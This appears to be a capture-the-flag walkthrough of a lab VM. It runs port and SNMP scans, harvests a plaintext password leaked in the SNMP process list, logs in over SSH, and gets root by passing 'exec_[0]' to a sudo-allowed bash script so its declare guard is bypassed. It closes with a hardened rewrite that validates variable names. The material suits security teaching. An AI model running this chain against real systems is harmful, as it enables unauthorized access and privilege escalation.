Information gathering
```bash
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.228  08:00:27:82:5e:1a  PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.31.228
```
```bash
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 05:13 EST
Nmap scan report for 113 (192.168.31.228)
Host is up (0.00099s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: 400 Bad Request
MAC Address: 08:00:27:82:5E:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.99 ms 113 (192.168.31.228)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.26 seconds
```
Directory scan
```bash
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.228
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,php3,txt,bk,zip,tar,gz,html,bak,shtml
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 796]
/.php                 (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
```
Nothing of interest on port 80.
UDP scan
```bash
┌──(root㉿kali)-[~]
└─# nmap -sU -T5 --min-rate 100 --max-rate 500 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 05:44 EST
Warning: 192.168.31.228 giving up on port because retransmission cap hit (2).
Nmap scan report for 113 (192.168.31.228)
Host is up (0.0013s latency).
Not shown: 983 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
161/udp   open   snmp
643/udp   closed sanity
1072/udp  closed cardax
1087/udp  closed cplscrambler-in
1090/udp  closed ff-fms
1782/udp  closed hp-hcip
1901/udp  closed fjicl-tep-a
3456/udp  closed IISrpc-or-vat
6004/udp  closed X11:4
6050/udp  closed x11
19374/udp closed unknown
36669/udp closed unknown
42313/udp closed unknown
42577/udp closed unknown
42627/udp closed unknown
51456/udp closed unknown
51972/udp closed unknown
MAC Address: 08:00:27:82:5E:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds
```
Port 161/udp is open and running SNMP.
Next, check the SNMP service for information leaks.
```bash
┌──(root㉿kali)-[~]
└─# snmp-check $IP
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.31.228:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.31.228
  Hostname                      : 113
  Description                   : Linux 113 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
  Contact                       : root
  Location                      : Unknown
  Uptime snmp                   : 00:35:33.04
  Uptime system                 : 00:35:19.11
  System date                   : 2026-1-18 05:46:42.0

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 2607728
  TCP segments sent             : 2596341
  TCP segments retrans          : 6
  Input datagrams               : 2623891
  Delivered datagrams           : 2623891
  Output datagrams              : 2596916

[*] Network interfaces:

  Interface                     : [ up ] lo
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 10 Mbps
  MTU                           : 65536
  In octets                     : 8184
  Out octets                    : 8184

  Interface                     : [ up ] Intel Corporation 82540EM Gigabit Ethernet Controller
  Id                            : 2
  Mac Address                   : 08:00:27:82:5e:1a
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 417797211
  Out octets                    : 1231871439

[*] Network IP:

  Id          IP Address          Netmask             Broadcast
  1           127.0.0.1           255.0.0.0           0
  2           192.168.31.228      255.255.255.0       1

[*] Routing information:

  Destination         Next hop            Mask                Metric
  0.0.0.0             192.168.31.1        0.0.0.0             1
  192.168.31.0        0.0.0.0             255.255.255.0       0

[*] TCP connections and listening ports:

  Local address       Local port      Remote address      Remote port     State
  0.0.0.0             22              0.0.0.0             0               listen

[*] Listening UDP ports:

  Local address       Local port
  0.0.0.0             68
  0.0.0.0             161

[*] Processes:

  Id      Status      Name              Path                          Parameters
  ...
  352     runnable    systemd-logind    /lib/systemd/systemd-logind
  376     runnable    sleep             service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080 infinity
  385     runnable    dhclient          /sbin/dhclient                -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0...
```
The process list shows a sleep process (PID 376) that has started a service on port 8080 with the arguments `service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080`, exposing the username welcome and the password mMOq2WWONQiiY8TinSRF on the command line.
Let's see whether these credentials also work for SSH.
```bash
┌──(root㉿kali)-[~]
└─# ssh welcome@$IP -p 22
The authenticity of host '192.168.31.228 (192.168.31.228)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.31.228' (ED25519) to the list of known hosts.
welcome@192.168.31.228's password:
Linux 113 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 14 08:32:23 2026 from 192.168.3.94
welcome@113:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)
welcome@113:~$ ls -ah
.  ..  .bash_history  .bash_logout  .bashrc  .profile  user.txt
welcome@113:~$ cat user.txt
flag{user-21539141ad1bc8ab9d26420aecb2415b}
```
Privilege escalation
List the commands the current user is allowed to run through sudo.
```bash
welcome@113:~$ sudo -l
Matching Defaults entries for welcome on 113:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on 113:
    (ALL) NOPASSWD: /opt/113.sh
```
Look at the contents of /opt/113.sh.
```bash
welcome@113:~$ cat /opt/113.sh
#!/bin/bash

sandbox=$(mktemp -d)
cd $sandbox

if [ "$#" -ne 3 ];then
    exit
fi

if [ "$3" != "mazesec" ]
then
    echo "\$3 must be mazesec"
    exit
else
    /bin/cp /usr/bin/mazesec $sandbox
    exec_="$sandbox/mazesec"
fi

if [ "$1" = "exec_" ];then
    exit
fi

declare -- "$1"="$2"
$exec_
```
The last few lines are where the vulnerability lies:
```bash
if [ "$1" = "exec_" ];then
    exit
fi

declare -- "$1"="$2"
$exec_
```
The script's logic is:

- Define the variable `exec_`, pointing at the copied binary `$sandbox/mazesec`
- Refuse to run if the first argument `$1` is named `exec_`
- Use `declare` to dynamically declare a variable, assigning `$2` to the variable named `$1`
- Execute `$exec_`
The goal is to overwrite the `exec_` variable so that it points at /bin/bash, which then runs as root.
Although the script explicitly rejects `$1` equal to "exec_", in bash a scalar variable and element 0 of an array of the same name are the same thing: `exec_` is equivalent to `exec_[0]`.
In a string comparison, however, "exec_[0]" is not equal to "exec_".
So passing `exec_[0]` as the variable name gets past the if check, and `declare` overwrites the value of `exec_`.
```bash
welcome@113:~$ sudo /opt/113.sh "exec_[0]" "/bin/bash" "mazesec"
root@113:/tmp/tmp.NFoFntObm4# id
uid=0(root) gid=0(root) groups=0(root)
root@113:/tmp/tmp.NFoFntObm4# cd /root
root@113:~# ls -ah
.  ..  113rootpass.txt  .bash_history  .bashrc  .cache  .gnupg  .local  .profile  root.txt  .ssh  .viminfo
root@113:~# cat root.txt
flag{root-9f283fe2f6363f99f80ed7f3f3c3cb19}
```
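The root cause is that `declare -- "$1"="$2"` accepts any string as a variable name while the guard only compares that string against the literal `exec_`, so an array subscript such as `exec_[0]` slips through. As an added example (not part of the original writeup or the target's script), the following hardened stand-in for the script's tail validates the shape of the name before assigning anything; the function names `is_safe_var_name`, `safe_declare` and `guarded_tail` are mine, `true` stands in for the mazesec binary, and a validated `eval` assignment replaces `declare` so the example also runs under POSIX sh.

```shell
#!/bin/sh
# Hardened stand-in for the tail of /opt/113.sh (added example).
# A caller-supplied variable name is accepted only if it is a bare
# identifier, so subscripts like exec_[0] never reach the assignment.

# Returns 0 when $1 is a plain identifier and not a name the script relies on.
is_safe_var_name() {
    case $1 in
        # empty, starts with a digit, or contains anything outside [A-Za-z0-9_]
        ''|[0-9]*|*[!A-Za-z0-9_]*) return 1 ;;
    esac
    case $1 in
        # denylist of names whose overwrite changes what runs or how it runs
        exec_|sandbox|PATH|IFS|ENV|BASH_ENV|LD_PRELOAD) return 1 ;;
    esac
    return 0
}

# Assigns $2 to the variable named $1, but only after the name check.
# With a validated identifier, eval "$1=\$2" does the same job as
# declare -- "$1"="$2" and cannot execute anything else.
safe_declare() {
    if ! is_safe_var_name "$1"; then
        echo "refused: '$1' is not an allowed variable name" >&2
        return 1
    fi
    eval "$1=\$2"
}

# Simulates the last lines of the script: set exec_, apply the caller's
# assignment, then run $exec_. Prints which command actually ran.
guarded_tail() {
    exec_=true          # placeholder for "$sandbox/mazesec"
    safe_declare "$1" "$2" || return 1
    "$exec_"
    printf '%s\n' "$exec_"
}
```

With this check, `sudo /opt/113.sh "exec_[0]" "/bin/bash" "mazesec"` would be refused before `declare` runs, and any other caller-chosen name can no longer redirect `$exec_`.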